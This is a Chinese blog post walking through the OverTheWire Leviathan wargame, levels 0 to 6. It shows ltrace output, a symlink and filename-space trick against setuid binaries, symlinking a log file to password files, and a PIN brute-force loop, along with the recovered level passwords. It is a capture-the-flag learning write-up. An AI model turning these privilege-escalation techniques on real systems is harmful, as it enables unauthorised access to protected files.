OverTheWire之Leviathan

最新推荐文章于 2023-06-24 14:52:08 发布
最新推荐文章于 2023-06-24 14:52:08 发布
阅读量978 收藏 3
点赞数 1
分类专栏: 安全 文章标签: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/caiqiiqi/article/details/55347041
版权

level0 (在 html文件中grep password关键词)

/home/leviathan0/.backup目录下的html文件传到本地然后grep一下password关键词。

➜ level0 git:(master) grep password bookmarks.html [22:31:04]

password to leviathan1

得到level1的密码为
rioGegei8m

level1 (ltrace的简单使用)

发现home目录下的check可执行文件(setuid)

leviathan1@melinda:~$ ltrace ./check 
...
strcmp("asd", "sex")
...

用sex成功得到shell
cat /etc/leviathan_pass/leviathan2
得到level2的密码为
ougahZi8Ta

level2 (access()检查文件是否存在,而/bin/cat 并不检查文件名是否含有空格, 符号链接)

leviathan2@melinda:/tmp/solveme$ ltrace ~/printfile "file tmp.txt"
__libc_start_main(0x80484f4, 2, -10348, 0x80485d0, 0x8048640
access("file tmp.txt", 4) = 0
snprintf("/bin/cat file tmp.txt", 511, "/bin/cat %s", "file tmp.txt") = 21
system("/bin/cat file tmp.txt"/bin/cat: file: Permission denied
/bin/cat: tmp.txt: No such file or directory

通过ltrace命令发现./printfile会通过调用access()检查文件是否存在,确认存在之后再调用cat命令,打印出文件内容。
所以我们需要先利用空格的bug,创建一个文件名中含有空格的文件,然后将空格前面(或后面)的字符串作为
/etc/leviathan_pass/leviathan3的链接文件。

leviathan2@melinda:/tmp/your_name$ ln -s  /etc/leviathan_pass/leviathan3 a
leviathan2@melinda:/tmp/your_name$ touch a\ b.txt
leviathan2@melinda:/tmp/your_name$ ~/printfile a\ b.txt
Ahdiemoo1j
/bin/cat: b.txt: No such file or directory

得到level3的密码为
Ahdiemoo1j

level3

依然是用ltrace

leviathan3@melinda:~$ ls
level3
leviathan3@melinda:~$ ltrace ./level3
__libc_start_main(0x80485fe, 1, 0xffffd794, 0x80486d0 <unfinished ...>
strcmp("h0no33", "kakaka")                                                             = -1
printf("Enter the password> ")                                                         = 20
fgets(Enter the password> snlprintf
"snlprintf\n", 256, 0xf7fcac20)                                                  = 0xffffd58c
strcmp("snlprintf\n", "snlprintf\n")                                                   = 0
puts("[You've got shell]!"[You've got shell]!
)                                                            = 20
system("/bin/sh"$ id
uid=12003(leviathan3) gid=12003(leviathan3) groups=12003(leviathan3)
$ exit
 <no return ...>
 --- SIGCHLD (Child exited) ---
 <... system resumed> )                                                                 = 0
 +++ exited (status 0) +++
 leviathan3@melinda:~$ ./level3
 Enter the password> snlprintf
 [You've got shell]!
 $ id
 uid=12003(leviathan3) gid=12003(leviathan3) euid=12004(leviathan4) groups=12004(leviathan4),12003(leviathan3)
 $ cat /etc/leviathan_pass/leviathan4
 vuH0coox6m

得到level4的密码为
vuH0coox6m

level4

发现/.trash.bin,执行之,得到
01010100 01101001 01110100 01101000 00110100 01100011 01101111 01101011 01100101 01101001 00001010
将字节码放到
http://www.binaryhexconverter.com/binary-to-ascii-text-converter
解码得到
Tith4cokei

得到level5的密码为
Tith4cokei

level5 (ln -s 符号链接)

执行

leviathan5@melinda:~$ ./leviathan5
Cannot find /tmp/file.log

发现需要用到/tmp/file.log, 于是尝试写入任意字符串到该文件

leviathan5@melinda:~$ echo  "xxx" >> /tmp/file.log
leviathan5@melinda:~$ ./leviathan5
xxx

于是可以将该文件设置为需要的文件的链接

leviathan5@melinda:~$ ln -s /etc/leviathan_pass/leviathan6  /tmp/file.log
leviathan5@melinda:~$ ./leviathan5
UgaoFee4li

于是得到level6的密码为
UgaoFee4li

level6 (shell脚本暴力破解)

参考
http://blog.zer0w1re.net/over-the-wire-leviathan-walkthrough/
既然只是4位数,可暴力破解

for i in {0000..9999}; do ./leviathan6 $i; echo $i; done

结果得到

Wrong
7119
Wrong
7120
Wrong
7121
Wrong
7122
$id                                                                                                                                        [ uid=12006(leviathan6) gid=12006(leviathan6) euid=12007(leviathan7) groups=12007(leviathan7),12006(leviathan6)
$ cat /etc/leviathan_pass/leviathan7
ahy7MaeBo9
caiqiiqi
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
html_over_the_wire:一个在线比较HTML不同解决方案的网站
04-06
html_over_the电线 一个网站,用于比较行业中有线解决方案上的不同HTML,以做出更好的决策。 地方发展 克隆存储库,安装依赖项,然后启动服务器。 git clone https://github.com/rajasegar/html_over_the_wire cd html_over_the_wire npm install npm start 如果要更改任何指标,请编辑data.js文件并提高PR。
OverTheWire:Wargame-Natas通关指引
weixin_47610939的博客
01-20 3283
OverTheWire的Wargame系列有很多,Natas是关于web渗透的wargame,通过Natas的训练,掌握基本的Web渗透技巧
OverTheWire: Bandit通关指引
热门推荐
weixin_47610939的博客
01-16 1万+
OverTheWire Wargame的Bandit通关指引
OverTheWire-Leviathan
kang0x0的博客
08-13 379
文章目录前言Level 0Level 0 -> Level 1Level 1 -> Level 2Level 2 -> Level 3Level 3 -> Level 4Level 4 -> Level 5Level 5 -> Level 6Level 6 -> Level 7总结 前言 本篇文章为OverTheWire网站Leviathan关卡的学习记录。 Leviathan主要是对Linux命令的考察。 通过ssh leviathanX@leviathan.
HTML Over the wire 框架和单页面应用的区别
SAP 资深技术专家 Jerry Wang 的技术分享
06-24 699
HTML Over the wire 方法包括类似于多页面应用程序 (MPA) 的服务器端渲染 (SSR)。然而,在初始请求之后,浏览器仅通过 AJAX 异步检索 HTML 片段,因此整个页面不再重新渲染。单页面应用(Single Page Application,简称SPA)和多页面应用(Multi Page Application,简称MPA)是两种不同的Web应用构建方式。它们在页面加载、数据处理、用户体验等方面有显著的差异。这些应用在用户与之交互时,页面内容会动态更新,无需刷新整个页面。
flask-wire:Flask扩展,将“ HTML over the wire”功能引入Flask
05-06
烧瓶线 Flask-Wire是Flask扩展,它为Flask带来了“ HTML over the wire”功能。 它受Laravel的和Ruby on Rails的启发很大,最后但并非最不重要的是 。 如果您以前从未听说过“ HTML over the wire”,请阅读以使您快速入门。 用法 首先,运行以下命令安装软件包 pip install Flask-Wire 现在,让我们编写一个简单的Flask应用程序,以演示实际的扩展。 app.py import time from flask import Flask , render_template_string from flask_wire import Wire def create_app (): app = Flask ( __name__ ) Wire ( app ) @ app . rou
[学习笔记]overthewire bandit 通关秘籍
04-19 1108
1、第一关 使用putty等工具连入linux即可,注意port等设置。 ls 列目录内文件; cat readme,显示文件内容,即可看到密码。 2、第二关 如何查看文件名为-的文件? cat ./- 3、第三关 如何查看文件名包含空格的文件? cat "spaces in this filename" 4、第四关,如何查看隐藏文件? ls -a或者ll cat...
OverTheWire:Natas通关思路记录和介绍(持续更新中2019.03.14)
cynthrial的博客
03-01 3512
OverTheWire:Natas通关思路记录和介绍前言什么是Natas通关思路Natas Level 0Natas Level 0 → Level 1Natas Level 1 → Level 2Natas Level 2 → Level 3Natas Level 3 → Level 4Natas Level 4 → Level 5Natas Level 5 → Level 6 前言 为什么这个...
WarGames-leviathan(0-7)
whklhhhh的博客
08-14 837
Level 0登录以后发现空空如也,提示也刻意没有 顺手find一下,发现有很多隐藏文件leviathan0@leviathan:~$ find . ./.cache ./.cache/motd.legal-displayed ./.profile ./.bashrc ./.bash_logout ./.backup ./.backup/bookmarks.html前面几个都是初始化/收尾的脚本,
Leviathan Auditor-开源
07-04
Leviathan Auditor 是一个枚举和渗透测试工具,可在 Microsoft 机器上运行。 它通过端口 139 或 445 转储用户、组、服务、共享、传输设备和 MAC 地址。它枚举 RPC 端口映射器条目
leviathan:测试框架
04-29
要设置Leviathan,需要同时配置硬件和软件。 如果要设置独立的测试机器人,则在被测设备(DUT)上运行测试之前,请仔细按照以下说明进行操作。 克隆存储库 使用git clone --recursive或克隆此存储库 运行git clone ...
Leviathan:Leviathan游戏引擎
02-04
Leviathan游戏引擎建立状态主: 开发: Windows版本: 主: 开发:
Leviathan:IGCDP项目
06-11
GCDP IGCDP项目
leviathan:我的世界
05-03
Leviathan的目标是提供可扩展的Minecraft基岩服务器,以有效利用您的服务器容量,当然也要使服务器具有更多功能。 发展 目前,我正在设计一个易于使用和理解的良好网络接口,这归功于NukkitX对这种设计思想的重写。...
后端开发是一个涉及广泛技术和工具的领域.docx
04-30
后端开发是一个涉及广泛技术和工具的领域,这些资源对于构建健壮、可扩展和高效的Web应用程序至关重要。以下是对后端开发资源的简要介绍: 首先,掌握一门或多门编程语言是后端开发的基础。Java、Python和Node.js是其中最受欢迎的几种。Java以其跨平台性和丰富的库而著名,Python则因其简洁的语法和广泛的应用领域而备受欢迎。Node.js则通过其基于JavaScript的单线程异步I/O模型,为Web开发提供了高性能的解决方案。 其次,数据库技术是后端开发中不可或缺的一部分。关系型数据库(如MySQL、PostgreSQL)和非关系型数据库(如MongoDB、Redis)各有其特点和应用场景。关系型数据库适合存储结构化数据,而非关系型数据库则更适合处理大量非结构化数据。 此外,Web开发框架也是后端开发的重要资源。例如,Express是一个基于Node.js的Web应用开发框架,它提供了丰富的API和中间件支持,使得开发人员能够快速地构建Web应用程序。Django则是一个用Python编写的Web应用框架,它采用了MVC的软件设计模式,使得代码结构更加清晰和易于维护。
华为数字化转型实践28个精华问答glkm.pptx
04-30
华为数字化转型实践28个精华问答glkm.pptx
新员工入职培训全流程资料包gl.zip
04-30
新员工入职培训全流程资料包(100+个文件) 1入职流程指引 万科新职员入职通知书 万科新职员入职引导手册 新进员工跟进管理表 新员工入职报到工作单(文职) 新员工入职报到流程 新员工入职流程表 新员工入职手续办理流程(工厂 新员工入职手续清单 新员工入职须知 新员工入职训流程 新员工入职引导表(导师用) 2 入职工具表格 3 培训方案计划 4培训管理流程 5培训教材课件 6 培训效果检测 7 员工管理制度 8 劳动合同协议 9 新员工培训PPT模板(28套)
三菱PLC通讯程序实例
04-30
FX5U PLC作为主、从站的通讯方式程序实例,以及包含详细说明文件...
技术需求报告-集行波测距与故障录波功能于一体的电网综合故障分析系统.docx
最新发布
04-30
技术需求报告-集行波测距与故障录波功能于一体的电网综合故障分析系统.docx
最新二开版本源码博客论坛源码,UI很漂亮,可切换皮肤界面.rar
04-30
最新二开版本源码博客论坛源码,UI很漂亮,可切换皮肤界面.rar最新二开版本源码博客论坛源码,UI很漂亮,可切换皮肤界面.rar

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值